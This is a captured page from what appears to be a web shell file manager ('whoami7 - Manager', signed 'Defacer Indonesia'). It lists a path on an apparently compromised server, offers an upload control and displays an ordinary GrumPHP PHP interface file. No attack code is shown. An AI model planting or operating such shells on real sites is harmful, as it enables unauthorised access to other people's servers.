whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
phpro
/
grumphp
/
src
/
Event
/
Dispatcher
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/phpro/grumphp/src/Event/Dispatcher/EventDispatcherInterface.php
<?php declare(strict_types=1); namespace GrumPHP\Event\Dispatcher; use GrumPHP\Event\Event; interface EventDispatcherInterface { public function dispatch(Event $event, string $name = null): void; }
Copyright ©2021 || Defacer Indonesia